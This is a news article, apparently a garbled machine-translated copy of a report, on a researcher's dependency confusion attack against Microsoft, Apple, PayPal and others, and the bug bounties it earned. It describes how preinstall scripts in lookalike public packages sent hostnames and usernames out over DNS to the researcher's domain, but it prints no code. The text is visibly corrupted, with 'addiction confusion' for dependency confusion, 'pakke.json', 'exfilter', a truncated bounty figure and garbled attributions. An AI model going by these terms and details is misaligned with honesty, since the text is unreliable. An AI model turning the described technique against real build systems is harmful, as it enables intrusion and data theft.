A researcher managed to break over 35 large companies’ internal systems, including Microsoft, Apple, PayPal, Shopify, Netflix, Yelp, Tesla and Uber, in a new attack on the software supply chain.
The attack involved uploading malware to open source archives, including PyPI, npm and RubyGems, which are then automatically distributed downstream of the company’s internal applications.
Unlike traditional typosquatting attacks that rely on social tactics or the victim misspelled a packet name, this specific supply chain attack is more sophisticated as it did not require any action from the victim, who automatically received the malicious packets.
This is because the attack exploited a unique design flaw in open source ecosystems addiction confusion.
For his ethical research efforts, the researcher has earned well over $ 1
Malware is automatically distributed downstream
Last year, security researcher Alex Birsan came up with an idea while working with another researcher Justin Gardner.
Gardner had shared a manifesto with Birsan, pakke.json, from an npm package used internally by PayPal.
Birsan noted that some of the manifest file packages were not present in the public npm repository, but were instead PayPal private npm packages, used and stored internally by the company.
After seeing this, the researcher wondered if there should be a package with the same name in the public npm depot, in addition to a private NodeJS depot, which one would be given priority?
To test this hypothesis, Birsan began searching for names of private internal packages that he could find in manifest files on GitHub archives or in CDNs of prominent companies, but did not exist in a public archive with open source.
The researcher then started creating fake projects using the same names in open source archives such as npm, PyPI and RubyGems.
Each package released by Birsan was made under his real account and clearly had a disclaimer in place, which said “This package is intended for security research purposes and contains no useful code.”
Birsan soon realized that if an add-on package used by a program exists in both a public open source repository and your private build, the public package will be prioritized and pulled instead – without having to do anything from the developer.
In some cases, as with PyPI packages, the researcher noted that the higher version package would be prioritized regardless of where it was.
Using this technique, Birsan carried out a successful supply chain attack against Microsoft, Apple, PayPal, Shopify, Netflix, Tesla, Yelp and Uber by simply publishing public packages with the same name as the company’s internal.
“I think addiction confusion is quite different from typosquatting or brandjacking, as it does not necessarily require any kind of manual input from the victim.”
“Rather, vulnerabilities or design flaws in automated building or installation tools can lead to public dependencies being confused with internal dependencies of the exact same name,” Birsan told BleepingComputer in an email interview.
Reconstruction and data filtering over DNS
The packages had pre-install script that automatically launched a script to exfilter identifying information from the machine as soon as the build process pulled the packages in.
Knowing that his scripts would be connected from corporate networks, Birsan decided to use DNS to filter out the data to circumvent detection.
“Knowing that most of the potential targets would be deep inside well-protected corporate networks, I thought DNS filtering was the way to go,” says Birsan in the blog post.
An excerpt of the code shown below is from the checked npm package “analytics-paypal” which has now been removed from npm. As a security researcher at Sonatype, however, I was able to retrieve it from our automated malware detection archives.
This script starts automatically as soon as the analytics-paypal dependency is pulled and has code to make DNS requests dns.alexbirsan-hacks-paypal.com.
The callback received from PayPal’s systems would then have alerted the researcher that the IP that sent the request belonged to PayPal, along with the username and home directory of the infected system.
When Birsan received such calls back and adequately confirmed that the researcher’s counterfeit component had successfully infiltrated the corporate network, he reported the findings to the company in question and earned a bug award.
Earn over $ 130,000 in bounties
In total, the researcher managed to earn over $ 130,000 in rewards through bug prize programs and pre-approved penetration schemes.
“I feel it is important to make it clear that every single organization targeted during this survey has given permission to have their safety tested, either through public bug premium programs or through private agreements. Do not try this type of test without authorization,” he said. warns Birsan.
For Birsan’s revelation, Microsoft has awarded him its maximum amount of $ 40,000 and released a large paper on this security issue. They identify this issue as CVE-2021-24105 for their Azure Artifactory product.
However, Microsoft told Birsan in an email that they consider this a design flaw in package managers.
“While we treat this as a serious security issue, it must ultimately be resolved by reconfiguring installation tools and workflows, and not by correcting anything in the package warehouses themselves.”
“To address this issue, Microsoft has made minor improvements to Azure Artifacts to ensure that it can be used as a trusted solution.”
“That said, we consider the root cause of this issue to be a design flaw (rather than a bug) in package managers that can only be addressed through reconfiguration,” a Microsoft spokesman said in the email.
In a statement to BleepingComputer, Yelp confirmed the researcher’s report and rewarded him after fixing the issue within a day.
“Through Yelp’s bug-bounty program, Alex Birsan helped us identify a vulnerability, which we immediately patched up in a day.”
“We are committed to working with security experts to stay up to date with the latest security techniques, and rely on our bug-bounty program to reward skilled security researchers who help improve Yelp’s systems and services,” a Yelp spokesman said. BleepingComputer.
Apple has told BleepingComputer that Birsan will be rewarded through the Apple Security Bounty program for responsibly revealing this issue.
While PayPal has now published Birsan’s HackerOne report and mentions the $ 30,000 amount.
However, the researcher’s ethical research efforts have not been embraced by everyone.
“I’m thinking this [is] probably reason enough not to have these projects on PyPI, ”claimed Dustin Ingram, Directory of Python Software Foundation and a spokesman for Google developers, who researched and took some of Birsan’s packages down from PyPI.
After spending an hour downloading these packages, Ingram stressed that uploading illegal packages to PyPI puts an unnecessary burden on the volunteers who maintain PyPI.
“If you are ultimately interested in protecting users from this type of attack, there are better ways to do it that protect the entire ecosystem, not just a specific set of organizations with bug bounties,” Ingram added. these packages for about an hour.
Attacks are expected to grow, a difficult problem to solve
Through this research that spans large organizations, Birsan says that he has already made the prominent technology companies aware of this type of attack which has now implemented a kind of mitigation across the infrastructure. However, the researcher believes there is more to discover.
The possibility remains that such attacks will emerge and grow, especially on open source platforms without a simple solution to addiction confusion.
“In particular, I believe that finding new and smart ways to leak internal package names will reveal even more vulnerable systems, and looking at alternative programming languages and archives to target will reveal some extra attack surface for addiction confusion errors,” the researcher concluded in his blog post.
Sonatype has released a script on GitHub that Nexus Repository Manager users can run to check if any of their private dependencies are named after existing packages present in the public npm, RubyGems, and PyPI repos. Companies with other artifact management managers can adopt identical implementations.
BleepingComputer has contacted the companies mentioned in this report in good time, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla, Yelp, Tesla and Uber. We have published the statements from companies that responded before press time.
Update February 10, 2021 16:30 ET: Added links to HackerOne reports for PayPal, Yelp revealed after press time.